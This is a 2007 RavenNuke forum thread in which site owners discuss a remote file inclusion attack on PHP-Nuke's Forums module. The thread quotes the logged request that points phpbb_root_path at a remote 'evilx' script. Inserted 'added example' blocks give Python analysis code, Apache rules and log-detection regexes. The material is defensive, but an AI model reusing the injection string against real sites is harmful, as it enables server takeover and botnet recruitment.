PHP Web Host - Quality Web Hosting For All PHP Applications Free RavenNuke(tm) Add Ons

selma
Hangin' Around
Joined: May 09, 2006
Posts: 31
PostPosted: Thu Jun 14, 2007 6:48 pm

Does anyone know what this is?

Just an information question, since my updated NS blocked about 30 attacks with the following string, from different IPs, today.

This is the string, with the domain left off, since this is my oldest site and it seems to attract every type of mal intent. It's just a non profit festival site - nothing involving money, though it has always had a problem with email hijackers sending pump and dumps, watch sales and viagra mail. Until the recent upgrade. Not sure if it's over, but quiet so far.

Query:
//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.freewebtown.com/sclipici/evilx??

Get String:
//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.freewebtown.com/sclipici/evilx??

Post String:
//modules/Forums/admin/admin_styles.php

And ...

My forums module is inactive. Without Sentinel, could this query have worked?


Ok, one more...

What type of exploit or attack is this used for?


Thanks in advance,

Selma

evaders99
Former Moderator in Good Standing
Joined: Apr 30, 2004
Posts: 3221
PostPosted: Thu Jun 14, 2007 8:52 pm

It's a standard "Remote File Inclusion" ... this is a known exploit against older versions of phpNuke and it's being used by numerous botnets. The script itself allows the hacker to check for vulnerabilities and load a shellbot script to connect to his botnet. If successful, he can use the compromised machine to target others.
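The mechanics behind that request, as an added example in Python (not code from this thread, from phpBB or from PHP-Nuke). Old phpBB admin scripts built an include path by gluing a file name onto `$phpbb_root_path`; with PHP's register_globals on, the `phpbb_root_path=` parameter in the URL set that variable before the include ran, and allow_url_fopen then let include() fetch the prefix as a URL and execute whatever came back. The file name the script appends is not shown on the page, so `ASSUMED_SUFFIX` is an assumption, as is the allowlist in `ALLOWED_ROOT_PATHS`. One caveat on selma's question about the inactive Forums module: the request names the PHP file by path, so the web server runs that file directly without going through modules.php, and the module's active flag in the admin panel is never consulted unless the file itself checks it.

```python
"""
Added example; not code from the RavenNuke thread, from phpBB or from PHP-Nuke.

Models the request selma posted against the include pattern behind it. Old
phpBB admin scripts built an include path by gluing a file name onto
$phpbb_root_path (roughly: include($phpbb_root_path . 'some/file.php')).
With register_globals on, ?phpbb_root_path=... in the URL set that variable
first, and allow_url_fopen let include() fetch the result as a URL.
"""
from urllib.parse import parse_qs, urlsplit

# Assumptions, for illustration only: the file name the script appends and the
# relative prefixes it legitimately uses are not shown on the page.
ASSUMED_SUFFIX = "admin/pagestart.php"
ALLOWED_ROOT_PATHS = ("./", "./../")

# The request string from selma's NukeSentinel alert.
REQUEST = ("//modules/Forums/admin/admin_styles.php"
           "?phpbb_root_path=http://www.freewebtown.com/sclipici/evilx??")


def root_path_from_request(request_target):
    """What register_globals handed the script: the raw query parameter."""
    _, _, query = request_target.partition("?")
    return parse_qs(query, keep_blank_values=True).get("phpbb_root_path", [""])[0]


def resolve_include(root_path, suffix=ASSUMED_SUFFIX):
    """Mimic include($root_path . $suffix) on a PHP with allow_url_fopen on."""
    target = root_path + suffix
    parts = urlsplit(target)
    if parts.scheme in ("http", "https", "ftp"):
        # PHP's HTTP wrapper asks the remote host for parts.path. Everything
        # after the first '?' of the glued string travels as a query string,
        # so the attacker's trailing '??' discards the appended file name and
        # the remote host serves 'evilx' whole. PHP then executes it.
        return {"remote": True, "host": parts.netloc, "path": parts.path,
                "query": parts.query, "target": target}
    return {"remote": False, "target": target}


def is_safe_root_path(value):
    """Hardened check for an include prefix.

    Anything naming a scheme or stream wrapper (http://, ftp://, php://,
    data:), an absolute path or a NUL byte is refused outright; what is left
    must be one of the known relative prefixes. The real fix is to assign the
    prefix in code before any include so the request cannot set it at all,
    with register_globals and allow_url_include off; this check is a second
    line behind that.
    """
    if ":" in value or "\x00" in value or value.startswith("/"):
        return False
    return value in ALLOWED_ROOT_PATHS


if __name__ == "__main__":
    injected = root_path_from_request(REQUEST)
    print("phpbb_root_path taken from the request:", injected)
    print("include() would fetch:", resolve_include(injected))
    print("passes hardened check:", is_safe_root_path(injected))
    print("passes hardened check (legitimate):", is_safe_root_path("./../"))
```

Run it and `resolve_include` shows the remote host being asked for `/sclipici/evilx` with `?admin/pagestart.php` as a throwaway query string, which is the whole reason for the `??` at the end of the injected value.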

selma
Hangin' Around
Joined: May 09, 2006
Posts: 31
PostPosted: Fri Jun 15, 2007 9:16 am

Thanks for that answer, Evaders99

If I'm not careful, I could get addicted to NS and how it works.

But I guess in the wide world of addictions, that one wouldn't be so bad.

Have a good day

Selma

evaders99
Former Moderator in Good Standing
Joined: Apr 30, 2004
Posts: 3221
PostPosted: Fri Jun 15, 2007 6:07 pm

Block libwww-perl using .htaccess and that will take out 99.9% of these attempts.

Gremmie
Former Moderator in Good Standing
Joined: Apr 06, 2006
Posts: 2415
Location: Iowa, USA
PostPosted: Fri Jun 15, 2007 6:31 pm

This is what I use for that. I have this at the bottom of my .htaccess file:

Code:

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl
RewriteRule ^.*$ [redirect target hidden from guests on this board] [R,L]

I tested it by writing a Perl script that tries to browse my site and it worked.

selma
Hangin' Around
Joined: May 09, 2006
Posts: 31
PostPosted: Fri Jun 15, 2007 8:16 pm

I really can't believe how helpful everyone is around here.

A couple of years ago, I paid more than $600 for a program that the developer installed in the wrong folder, so it wouldn't work. I had to stay up 'til midnight every night for about three weeks to catch them to continually do fixes, because they were based in India. The code was all encrypted and I finally just scrapped it for another program.

You all are WAAAAAYYYYYY better than them!

Thanks, Selma

wiz
Client
Joined: Oct 09, 2006
Posts: 394
Location: UK
PostPosted: Fri Jun 15, 2007 9:25 pm

Always search for what you can for free; then you will inevitably come across goldmine websites like this one.

montego
Site Admin
Joined: Aug 29, 2004
Posts: 9136
Location: Arizona
PostPosted: Sat Jun 16, 2007 1:35 pm

Just remember that it costs someone, Raven, money to run this site. If we don't support him through donations, these doors end up closing too. Every little bit helps. He, and others here, helped me out a lot too when I first started and so I became "hooked". Now, I get a chance to do my part by helping others too.

elric
New Member
Joined: Jun 15, 2007
Posts: 13
PostPosted: Sat Jun 16, 2007 2:17 pm

Gremmie wrote:
This is what I use for that. I have this at the bottom of my .htaccess file:

Code:

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl
RewriteRule ^.*$ [redirect target hidden from guests on this board] [R,L]

I tested it by writing a Perl script that tries to browse my site and it worked.


I have been getting these attacks for the last week or so; would the following .htaccess be the correct way of adding your code?
Code:

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl/[0-9].[0-9]*
RewriteRule ^.*$ http://127.0.0.1 [R,L]
RewriteCond %{HTTP_HOST} !^www\.
RewriteRule ^(.*)$ http://www.%{HTTP_HOST}/$1 [R=301,L]
<Files 403.shtml>
order allow,deny
allow from all
</Files>

deny from 200.150.35.165
deny from 69.243.47.54
deny from 68.34.112.209
deny from 71.114.62.162
deny from 69.243.44.134
deny from 69.243.45.51
deny from 24.55.180.176
deny from 71.114.65.115
deny from 208.31.155.254
deny from 82.146.165.139

RewriteCond %{HTTP_USER_AGENT} ^libwww-perl/[0-9].[0-9]*
RewriteRule ^.*$ http://127.0.0.1 [R,L]


Also, I hope you don't mind, but is there any chance you could let me have a copy of your script? I'd like to test mine.

Gremmie
Former Moderator in Good Standing
Joined: Apr 06, 2006
Posts: 2415
Location: Iowa, USA
PostPosted: Sat Jun 16, 2007 9:15 pm

Well, I dunno if yours will work or not since I barely understand the rewrite engine...

But here is the Perl script. I got it from the 'net somewhere...

Code:

#!/usr/bin/perl
# Simple LWP browser for testing.  LWP sends "libwww-perl/<version>" as its
# User-Agent unless told otherwise, which is what the .htaccess rule keys on.
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request;

my $ua = LWP::UserAgent->new;

my $req = HTTP::Request->new(GET => 'http://www.yoursite.com/');
$req->header('Accept' => 'text/html');

# send request
my $res = $ua->request($req);

# check the outcome: if the block fired you get an error line, not the page
if ($res->is_success)
{
   print $res->content;
}
else
{
   print "Error: " . $res->status_line . "\n";
}

elric
New Member
Joined: Jun 15, 2007
Posts: 13
PostPosted: Sun Jun 17, 2007 1:35 pm

Thanks

Been searching around and found this .htaccess generator; it does not do everything but it's pretty neat.
[link hidden from guests on this board]

I have also now uncovered more questions:
How to incorporate the above and also the Sentinel code?

So far I have this
Code:
RewriteEngine On
RewriteCond %{HTTP_HOST} !^www\.
RewriteRule ^(.*)$ http://www.%{HTTP_HOST}/$1 [R=301,L]

RewriteCond %{HTTP_USER_AGENT} ^libwww-perl
RewriteRule ^.*$ http://127.0.0.1 [R,L]

<Files 403.shtml>
order allow,deny
allow from all
</Files>

deny from 200.150.35.165
deny from 69.243.47.54
deny from 68.34.112.209
deny from 71.114.62.162
deny from 69.243.44.134
deny from 69.243.45.51
deny from 24.55.180.176
deny from 71.114.65.115
deny from 208.31.155.254
deny from 82.146.165.139

# -------------------------------------------
# Start of NukeSentinel(tm) admin.php Auth
# -------------------------------------------
<Files .ftaccess>
  deny from all
</Files>

<Files .staccess>
  deny from all
</Files>

<Files admin.php>
   <Limit GET POST PUT>
      require valid-user
   </Limit>
   AuthName "Restricted"
   AuthType Basic
   AuthUserFile   /path/to/your/.staccess
</Files>

# -------------------------------------------
# Start of NukeSentinel(tm) DENY FROM area
# -------------------------------------------


Can anyone with more knowledge than me (that's not hard) tell me if they can see any errors?
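Nobody on the page answers elric's question, so here, as an added example that is not from the thread, is the rewrite portion of that file with two changes a practitioner would want; the Files block, the deny list and the NukeSentinel section are left exactly as elric posted them and are omitted here. First, the libwww-perl rule refuses the request with a 403 instead of redirecting the client to 127.0.0.1. Second, a rule that matches the attack itself: any query parameter whose value starts with a URL scheme or a PHP stream wrapper, which catches the request whatever User-Agent string it arrives with. The list of schemes, and the assumption that no legitimate parameter on the site carries a URL, are mine; check the site's own redirect or return-URL parameters before enabling the second rule. On the draft itself: a RewriteCond governs only the RewriteRule immediately below it, so each pair has to stay together, which elric's second version already does (the duplicated libwww-perl pair at the end of the first draft was harmless but redundant).

```apache
RewriteEngine On

# Send bare-host requests to the www. name (the 301 from the post, unchanged).
RewriteCond %{HTTP_HOST} !^www\. [NC]
RewriteRule ^(.*)$ http://www.%{HTTP_HOST}/$1 [R=301,L]

# As posted: a 302 bounce to 127.0.0.1.
#   RewriteCond %{HTTP_USER_AGENT} ^libwww-perl
#   RewriteRule ^.*$ http://127.0.0.1 [R,L]
# Refuse instead: '-' means no substitution, F returns 403.  This still only
# catches clients that keep LWP's default agent string; a forged "Mozilla/4.0"
# walks straight past it.
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl [NC]
RewriteRule .* - [F,L]

# Match the attack rather than the tool: any query parameter whose value
# starts with a URL scheme or a PHP stream wrapper (http://, ftp://, php://,
# data:), plain or with the colon percent-encoded.  Does not depend on the
# User-Agent at all.  Assumption: no parameter on this site legitimately
# carries a URL; if one does, exclude it here.
RewriteCond %{QUERY_STRING} (^|&)[^&=]*=(https?|ftps?|php|data|expect)(:|%3A) [NC]
RewriteRule .* - [F,L]
```

Test it the same way Gremmie did: a request with the default LWP agent, and a second one with a browser agent string but `?phpbb_root_path=http://example.invalid/x??` in the query, should both come back 403; an ordinary page view should not.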

selma
Hangin' Around
Joined: May 09, 2006
Posts: 31
PostPosted: Tue Jun 19, 2007 9:19 am

montego wrote:
Just remember that it costs someone, Raven, money to run this site. If we don't support him through donations, these doors end up closing too. Every little bit helps. He, and others here, helped me out a lot too when I first started and so I became "hooked". Now, I get a chance to do my part by helping others too.


Glad you brought up that point, Montego. I've been thinking about that for the past couple of days.

I see that Raven asks for a combined total of 400 a month... Which is a pittance IMO.

I have to admit to being a spastic donor, once every few months or so. But I mentioned somewhere else that, since starting my first for-profit site, I intend to include RN in the monthly budget as a regular expense.

If there are 15,000 users plus and a third are regular users...

What would a good "support" donation be? Support to the point that the ecommerce module and some other major revision work that's talked about on the forum could be done?

During those couple of days referred to earlier, this thought's been running through my mind.

A donation from a few people of $50 adds up to a couple hundred dollars.

But... suppose "someone" (church lingo for "the person who suggested it") organized a type of pledge drive based on the fact that thousands of people use the scripts and tools and many actually depend on what you do to keep their start ups running efficiently.

Then suppose that 5,000 of the 15,000 would agree to pledge $5 per month.

Going a step beyond your donation mod, there could be a Supporters Hall where the name of the business or the person could be posted with a link - or something else clever that everyone would be dying to get their name or business posted to... Maybe a "Support Where it Counts" kind of button for webs.

Without getting way off track, 5,000 people at $5 a month is enough to keep a few staff members secure.

I love organizing and I certainly wouldn't mind putting some work into this kind of effort, and I think I still have free time between 5 - 6 am LOL

So, tell me your thoughts.


... And, noob alert:

Code:
RewriteCond %{HTTP_HOST} !^www\.
RewriteRule ^(.*)$ http://www.%{HTTP_HOST}/$1 [R=301,L]


What does this part of that code do?

I added the previous three lines of the code from Gremmie the other day, and haven't gotten any more attacks - thank you very much.

I understand what the code does, but I don't know how it does it, if that makes sense. Or is that part of your testing code, or the cooletips engine coding?

... And

Can you put the "libwww-perl" into the string, or script or referrer blocker in Sentinel?

Thanks in advance,

Selma

Gremmie
Former Moderator in Good Standing
Joined: Apr 06, 2006
Posts: 2415
Location: Iowa, USA
PostPosted: Tue Jun 19, 2007 9:48 am

It is easy for Perl programmers to forge the user agent. I am now seeing similar attacks on my site. It looks like the same scripts but now the user agent says Mozilla instead of libwww-perl. But Sentinel is stopping them.

That code looks like it is rewriting mysite.com into [link hidden from guests on this board].

selma
Hangin' Around
Joined: May 09, 2006
Posts: 31
PostPosted: Tue Jun 19, 2007 9:55 am

Got it Smile

Thanks

elric
New Member
Joined: Jun 15, 2007
Posts: 13
PostPosted: Tue Jun 26, 2007 2:45 pm

Thanks Gremmie,
And thanks for answering my next question before I'd even asked it.
I am no longer seeing the Perl attacks, but like you I have seen about 3 Mozilla/4.0 attacks and, as you say, Sentinel is stopping them.
The latest points to the script below.
[link hidden from guests on this board]

Gremmie
Former Moderator in Good Standing
Joined: Apr 06, 2006
Posts: 2415
Location: Iowa, USA
PostPosted: Tue Jun 26, 2007 5:46 pm

It is easy to modify that Perl script to change the user agent part of the header. The LWP module supports that.

elric
New Member
Joined: Jun 15, 2007
Posts: 13
PostPosted: Wed Jul 04, 2007 2:30 pm

And it certainly looks like that has been done. I am not getting any attacks with User Agent: perl, but now I am getting attacks like User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR

About 3 or 4 nearly every day.
a lot like the following:

Code:
www.mysite/modules.php?name=Forums&file=posting&mode=newtopic&f=1+[PLM=0]+GET+http://www.mysite/modules.php?name=Forums+[0,9018,76382]+->+[L]+POST+http://www.mysite/modules.php?name=Your_Account+[0,0,60072]+->+[N]+GET+http://www.mysite/modules.php?name=Forums&file=viewforum&f=1+[0,0,124857]+->+[N]+GET+http://www.mysite/modules.php?name=Forums&file=posting&mode=newtopic&f=1+[0,43072,59023]+->+[N]+POST+http://www.ffclan.us/modules.php?name=Forums&file=posting+[0,0,37628]
Get String:
[link hidden from guests on this board] [0,0,37628]&mode=newtopic&f=1 [0,43072,59023] -> [N] POST http://www.mysite/modules.php?name=Forums
Post String:
[link hidden from guests on this board]

Forwarded For: none
Client IP: none
Remote Address: 65.96.84.33
Remote Port: 1950
Request Method: GET

What I can't understand is why my site seems to be a target, whereas here, for example, has a mere 11 attacks blocked compared to my current 84; my site has way less traffic and I would certainly believe a much lower search engine rating.
Anyone know how targets are picked? I am guessing via a search engine.
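Log triage for the two things this thread has been circling, as an added example in Python that is not code from the thread or from NukeSentinel: the query-string signature of the remote-file-inclusion attempt, which does not care what the client calls itself, next to the libwww-perl User-Agent rule from the .htaccess posts, which stops only clients that keep LWP's default agent string, as Gremmie pointed out. The log lines are constructed in Apache "combined" format from the request strings quoted in this thread; addresses, hostnames and timestamps are made up and the long scripted-posting request is shortened. Counting absolute URLs inside the query string is a heuristic that also flags the forum-posting sequence elric quoted; on a site that legitimately passes URLs in parameters it will need tuning.

```python
"""
Added example; not code from the thread or from NukeSentinel.

Triage of access-log lines for two things discussed in this thread: the
query-string signature of a remote-file-inclusion attempt, and the
libwww-perl User-Agent rule from the .htaccess posts, which only stops
clients that keep LWP's default agent string. LOG_LINES are constructed in
Apache 'combined' format from the request strings quoted in the thread;
addresses, hostnames and times are made up and the scripted-posting request
is shortened.
"""
import re
from urllib.parse import parse_qsl

COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The RewriteCond elric posted, ^libwww-perl/[0-9].[0-9]*, as a Python regex.
UA_RULE = re.compile(r"^libwww-perl/[0-9].[0-9]*")

# A parameter value that begins with a URL scheme or a PHP stream wrapper.
REMOTE_VALUE = re.compile(r"^(?:[a-z][a-z0-9+.-]*://|data:|php:)", re.IGNORECASE)

# Any absolute URL anywhere in the query string (heuristic; see lead-in).
URL_ANYWHERE = re.compile(r"https?://", re.IGNORECASE)

RFI = ("//modules/Forums/admin/admin_styles.php"
       "?phpbb_root_path=http://www.freewebtown.com/sclipici/evilx??")
SPAM = ("/modules.php?name=Forums&file=posting&mode=newtopic&f=1+[PLM=0]"
        "+GET+http://www.example.com/modules.php?name=Forums+[0,9018,76382]+->+[L]"
        "+POST+http://www.example.com/modules.php?name=Your_Account+[0,0,60072]+->+[N]"
        "+POST+http://www.example.org/modules.php?name=Forums&file=posting+[0,0,37628]")
MSIE = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"

LOG_LINES = [  # constructed
    f'10.0.0.1 - - [14/Jun/2007:18:40:01 -0400] "GET {RFI} HTTP/1.1" 302 0 "-" "libwww-perl/5.805"',
    f'10.0.0.2 - - [19/Jun/2007:09:30:12 -0400] "GET {RFI} HTTP/1.1" 403 0 "-" "{MSIE}"',
    f'10.0.0.3 - - [04/Jul/2007:14:20:45 -0400] "GET {SPAM} HTTP/1.1" 403 0 "-" "{MSIE}"',
    '10.0.0.4 - - [04/Jul/2007:15:02:03 -0400] "GET /modules.php?name=News HTTP/1.1" 200 8421 '
    '"-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    '10.0.0.5 - - [04/Jul/2007:15:05:17 -0400] "GET /modules.php?name=Forums&file=viewforum&f=1 '
    'HTTP/1.1" 200 17322 "http://www.example.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; '
    'rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"',
]


def parse_combined(line):
    """Split one combined-format line into fields; None if it does not parse."""
    m = COMBINED.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"], _, rec["query"] = rec["target"].partition("?")
    return rec


def rfi_params(query):
    """Parameters whose decoded value starts with a scheme or wrapper."""
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if REMOTE_VALUE.match(v)]


def triage(line):
    """Classify one log line; None if it does not parse."""
    rec = parse_combined(line)
    if rec is None:
        return None
    rfi = rfi_params(rec["query"])
    urls = len(URL_ANYWHERE.findall(rec["query"]))
    if rfi:
        verdict = "rfi"            # an include prefix pointed at a remote file
    elif urls:
        verdict = "url-in-query"   # other URLs smuggled in, e.g. scripted posting
    else:
        verdict = "clean"
    return {"ip": rec["ip"], "path": rec["path"], "ua": rec["ua"],
            "verdict": verdict, "rfi_params": rfi, "embedded_urls": urls,
            "ua_rule_blocks": bool(UA_RULE.match(rec["ua"]))}


def summarize(lines):
    """Count what the query signature finds versus what the UA rule alone stops."""
    results = [r for r in map(triage, lines) if r is not None]
    suspicious = [r for r in results if r["verdict"] != "clean"]
    return {"parsed": len(results),
            "suspicious": len(suspicious),
            "stopped_by_ua_rule": sum(r["ua_rule_blocks"] for r in suspicious),
            "results": results}


if __name__ == "__main__":
    s = summarize(LOG_LINES)
    for r in s["results"]:
        print(f'{r["ip"]:<9} {r["verdict"]:<13} ua_rule={str(r["ua_rule_blocks"]):<5} {r["ua"][:45]}')
    print(f'{s["suspicious"]} suspicious of {s["parsed"]} parsed; '
          f'{s["stopped_by_ua_rule"]} stopped by the libwww-perl rule alone')
```

On these five lines the query signature flags three requests and the User-Agent rule would have stopped one of them: the second RFI attempt is byte-for-byte the first with a browser agent string, which is exactly what elric and Gremmie saw once libwww-perl was blocked. To run this over a real file, replace `LOG_LINES` with the lines of the server's access log.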

selma
Hangin' Around
Joined: May 09, 2006
Posts: 31
PostPosted: Thu Jul 05, 2007 12:44 pm

Quote:
What I can't understand is why my site seems to be a target, where as here for example has a mere 11 attacks blocked compared to my currently 84,


Hey Elric, Thought I was the only one they targeted for no good darn reason. Figured they probably know they can't get into Raven's site.

My site is a local arts organization. Nothing real exciting to want to break into. But one thing I did find out was that spammers especially, like to use the address of "trusted" sites to send their mail from. It means less bounces for them because the "trusted" address they are spoofing will get through most spam filters - by IP address anyway.

So maybe your search engine theory is right. Good search position = trusted site?

Still can't figure out why anyone else would want to get in though.

fkelly
Moderator
Joined: Aug 30, 2005
Posts: 3186
Location: near Albany NY
PostPosted: Thu Jul 05, 2007 1:44 pm

Quote:
Still can't figure out why anyone else would want to get in though.


Cause they are idiots and don't know or care what they are hacking. They just search for sites randomly and try various forms of attack and if they can hack you they get their jollies. So to speak. Don't try to attribute rationality to it. Just defend yourself as best you can.

selma
Hangin' Around
Joined: May 09, 2006
Posts: 31
PostPosted: Thu Jul 05, 2007 3:06 pm

"Cause they are idiots and don't know or care what they are hacking."

Agreed!

They need some kids and bills and stuff. Give 'em something to do!

Anybody seen this one? Only asking because this site's been getting hit with all types of mail that I know is blocked, which leads me to believe this sender has access somewhere I can't see.

The mail came from ...

Code:
Received: from word9 ([127.0.0.1]) by writely.com with Microsoft SMTPSVC(6.0.3790.1830);
Fri, 06 Jul 2007 04:14:56 +0800
Message-Id: <9.0.9.1.3.97943802796608.0[3

No subject, body message, or return sender in the actual letter. Just a blank mail. And that is the end of the header.

"Received: from word9 ([127.0.0.1])": this part looks like they are in my control panel and sending from there.

Freaky

Susann
Moderator
Joined: Dec 19, 2004
Posts: 3143
Location: Germany: Moderator, German NukeSentinel Support
PostPosted: Thu Jul 05, 2007 3:16 pm

Agreed, most are idiots, especially those script kiddies which just copy and paste some code. I have met different types of them online and talked back.
Most are young and they don't know the difference between crime and fun.
I could write a book about these stories but I don't publish something like that. It's in my memory; that's enough.
My last meeting was also funny. Someone registered new and in the meantime, while he was in his store, his friend played with his PC and tried to hack my site.
The newly registered user didn't know why he suddenly couldn't post in my forum anymore after he came back from his store. That's just one little funny story from my board.
But there are others too and they are really dangerous because they have the knowledge and the money to do these things like botnets etc.
However, iframes are currently very popular.
For example, Google for: hacked by
[link hidden from guests on this board]

German Nuke sites and phpBB boards have already been hacked by them.

elric
New Member
Joined: Jun 15, 2007
Posts: 13
PostPosted: Fri Jul 06, 2007 4:30 pm

Thanks for all your posts; for information, I'm now at 94 attacks. I agree with all your comments, but I just feel it's more than random.
I have even googled my site url in the hope of finding it posted in a security site with the "bet you can't hack me" type thing but to no avail.

selma
Hangin' Around
Joined: May 09, 2006
Posts: 31
PostPosted: Mon Jul 09, 2007 2:58 pm

Posted here: Union + nuke_authors
[link hidden from guests on this board]


Last edited by selma on Mon Jul 09, 2007 4:05 pm; edited 1 time in total

selma
Hangin' Around
Joined: May 09, 2006
Posts: 31
PostPosted: Mon Jul 09, 2007 3:44 pm

posted elsewhere -

elric
New Member
Joined: Jun 15, 2007
Posts: 13
PostPosted: Fri Jul 13, 2007 2:16 pm

I'm not entirely sure what the link you supplied is telling me, but it did highlight to me some of the comments posted to news topics which contained spammage of links and all sorts of text. I have deleted these and I hope perhaps this will drop some of the search engines picking up on keywords like an*l etc.

Once again Thank you for your help.
All logos and trademarks in this site are property of their respective owner.
The comments are property of their posters, all the rest © 2002-2011 by Raven.

Website engine's core code is © copyright by PHP-Nuke but has been heavily patched and modified by myself and others.
PHP-Nuke is free software released under the GNU/GPL.